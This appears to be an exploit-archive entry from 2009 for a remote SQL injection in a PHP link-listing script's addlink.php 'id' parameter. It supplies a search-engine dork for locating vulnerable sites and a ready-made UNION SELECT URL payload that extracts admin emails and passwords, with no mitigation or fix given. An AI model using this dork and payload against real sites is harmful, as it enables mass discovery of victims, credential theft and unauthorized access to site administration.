[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : list Web (addlink.php id) Remote SQL Injection Vulnerability
# Published : 2009-12-31
# Author : Hussin X
# Previous Title : Link Trader (lnkid) Remote SQL Injection Vulnerability
# Next Title : Classified Ads Scrip ( store_info.php id) Remote SQL Injection Vulnerability
|
| list Web (addlink.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|-------------------- Hussin X -------------------|
|
| Author: Hussin X
|
| Home : WwW.IQ-ty.CoM<http://WwW.IQ-ty.CoM>
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
| |
|
| script : http://maker.ir
|
| DorK : inurl:"ir/addlink.php?id=" or inurl:"addlink.php?id="
|___________________________________________________|
Exploit:
________
www.[target].com/Script/addlink.php?id=-0+union+select+1,concat(email,0x3e,password),3,4+from+admin--
IQ-SecuritY FoRuM